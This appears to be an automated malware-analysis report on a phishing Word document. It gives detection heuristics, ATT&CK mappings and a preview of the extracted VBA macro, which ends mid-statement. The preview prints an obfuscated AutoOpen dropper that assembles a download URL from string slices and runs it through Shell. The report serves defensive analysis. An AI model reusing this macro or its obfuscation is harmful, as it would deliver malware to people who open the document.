MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE file containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, indicating it's designed to download and run a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for phishing lures.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73465 bytes |

SHA-256 (macros.bas): 787b4b9767a63d92cc73038c582512d149469b3be1bc57e0987cc720eb350151
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rWMpvVU"
Sub AutoOpen()
WjdhpBfacRIzO = "pGHKnVzanjI" + "wuOWiwMvcOsCW" + "XJzYWAmJEduaWi" + "wszYwDlLFjMkS" + "aNEotwq" + "PKIEpplcIah" + "jVviXpm" + "rpKQTIdPplcjAS" + "nQtOvadalCN" + "FRaQDMslaz" + "ljMVmWzBENsIN" + "brXOOYNFnYz"
UYUIjDnYI = "iFqDnBJGNJNm" + "UUXLaijsoXX" + "ZjwhoUo" + "tISXKkLwhK" + "ChvznJrMtcpuh" + "BOVMZYoYR" + "MCzBqTkLdjVU" + "hJXzIutEOlE" + "WqjImzdQ" + "mkJqWardQ" + "wjknDBajdXiwRv" + "TcACqkrEQuYNH"
UBaznGclCfGM = "zsjoTOzCz" + "bZMGcUtfnTvJV" + "AdpPhaV" + "iRsLhFFzJiWKzX" + "zARJASsXpXf" + "pZhUXWivuOQmo" + "oKMnLDcDpPQ" + "VdluCoCRP" + "bOzoUcflji" + "ZdiLCMbLlk" + "EGBAJALck" + "KOiwoWjAXD"
lwvADjzcaFd = "JJtnUSfaHuwPO" + "NOpsKOjmSJFAGR" + "AKQjZZou" + "OhrdYrwjlDVl" + "iuPJWqjhTMOO" + "khipaYTF" + "dWCObLZPDva" + "bVRQDzLBv" + "dPQHRzvczR" + "ERsGHOYIDISn" + "ILRZWaIEiHsnzU" + "bUawJjXEYJvimt"
VBA.Shell$ MXHNMRsDav, 0
MLcWwFjVGWIcW = "zSJuijji" + "dNlGsPbrVK" + "vhLbVovwUbAEA" + "YqloIMHiqwJNwn" + "iinRfOS" + "iYpklOtd" + "kMTZpDMz" + "RqNRIpIspwNm" + "jGjCQTcWPz" + "AdmTjpbaUw" + "buRQActYwPWOjM" + "mntVMBtsQiCpL"
VmSZjfp = "zTAdrBFiPGGr" + "nhwjviB" + "lzmhYac" + "pzhABnZ" + "jJrmmPwiUw" + "FTpnznkNWNvT" + "daZJZqAzHdA" + "qPOWAENZsXkA" + "jMQZDHnq" + "JLpnJdziw" + "pBGYWrVJitjFq" + "zpijaDVMva"
CjNujbJ = "tKIdouiiwF" + "jDVQnUzOIuUcFf" + "TKIOwSZjw" + "qLpprVWHw" + "ChQZakNBiYiCzW" + "YZkGiGWYBwI" + "ZQYzVGlP" + "tioOEXCXjoOS" + "TwmAUnfIP" + "RaokGaMvMGp" + "qvsaiUBUIuq" + "zcLUmzkd"
End Sub
Function MXHNMRsDav()
PsdOVr = IsNull("ivboFwGfhrZKc") + IsNull("JqfiNZfIW") + IsNull("oCifowNt") + IsNull("kvTzNrvKKR") + IsNull("JmHAhOKlTSN") + IsNull("YUACRaqldf") + IsNull("rXqsRrSOVrszC")
uaHVDzPt = IsNull("MmNIjOwsNCq") + IsNull("nnvNSujUqNP") + IsNull("WznjOmnRZr") + IsNull("iYTYAXGtYPhfFr") + IsNull("IsplmwXtlh") + IsNull("MdaOZCwrRpz") + IsNull("iwjTrEpThs")
OWiEWRrVE = Mid("720Fu23Xz3NTHd80ittp://Z0r+Z0rhZ0r+Z0reg0iEc971HfS7O1IqonojOsdHs", 16, 27)
fzOlJwQcXMM = IsNull("dwalcaCXavdNod") + IsNull("TjBiwPdqVttB") + IsNull("rijWwHo") + IsNull("PzAFnUwvOED") + IsNull("fBKrTFfAHEsjZ") + IsNull("fvPGOjpHEjAYJv") + IsNull("vHoqLYqUpDsb")
ELKjYR = IsNull("tjCLQolq") + IsNull("VNhLOzAP") + IsNull("CpiKtDTEZjwb") + IsNull("VimEYVrJI") + IsNull("lnEAzTQWJKWFPf") + IsNull("nwsLOCsfDrwZ") + IsNull("biYcursX")
nKJtm = IsNull("ULHRjnoBfIpWA") + IsNull("zdquwkTMzD") + IsNull("NbpbaDWEBnsZi") + IsNull("VGfPwzUKAsqwI") + IsNull("rUINDYSMzaFFTR") + IsNull("kEEIBadnwwEYCa") + IsNull("kbuaNjffVJaIHE")
IqAWwuNllF = Mid("h1C0r+Z0r.Z0r+Z0r'+'comZ0r+g0i+g0iZ0r.br/ERreZ0r+Z0rNDZ0r+Z0r/,hZ0r+Z0r'+'g0i+gdrGUfropOhqWTqLaIQc", 5, 75)
zzkZrmPAq = IsNull("DUlINoQvQTGVl") + IsNull("zztvtHBIBt") + IsNull("ufmuLXn") + IsNull("wvXaFpDP") + IsNull("aiSoqHYi") + IsNull("vwQnvTs") + IsNull("SJdBFwT")
brhZDswU = IsNull("McCaRbGNSI") + IsNull("GqwNrwi") + IsNull("jzuJqNZSZljQla") + IsNull("bXqppWj") + IsNull("DJjBZWvSY") + IsNull("diVSSMNsJhbjr") + IsNull("jkUpAIoaz")
VtIAMvki = IsNull("mcbXnFqr") + IsNull("hXaSEYOPKcouL") + IsNull("EhDXumHVizdDfz") + IsNull("MpIYuNvR") + IsNull("OkPluTiQbcWp") + IsNull("ivFlMpaoAtQH") + IsNull("nfVRlIQSJJWVaO")
zcziisdj = Mid("im3jnlSRwIM0JLSJ4GhBwZ0rStrZ0r+Z0ring(), DZ0r+Z0rig0i+g0iZ0r+Z0rOZ0r+Z0rg0i+g0ihuZ01GqBjUjFPP", 22, 62)
scwAhzQA = IsNull("rAGLAvdTKZHr") + IsNull("JFiczMwqTRTV") + IsNull("BGRQCDjobRFCs") + IsNull("EIZRIoALk") + IsNull("fqNAqXjmqL") + IsNull("XBtWEIwhnZaFzu") + IsNull("uzLjoqVvkMpi")
UMpjdm = IsNull("FQMOPic") + IsNull("UStiLfIoOskNO") + IsNull("WtYZBssABJ") + IsNull("zmaiwTK") + IsNull("TKBPHiw") + IsNull("oVvMtmmtTqpjkA") + IsNull("RkiMsiKQZ")
NtBtAmBXhp = IsNull("EiSLjThGfvDjDd") + IsNull("wFlOFHcjbJWDBG") + IsNull("KOZzcEGO") + IsNull("fNcPEHAkMX") + IsNull("fbbcrbwqCKQfzW") + IsNull("oGGAsqqMisiN") + IsNull("UJlqdHdjnzG")
ansmlVc = Mid(
```

... (truncated)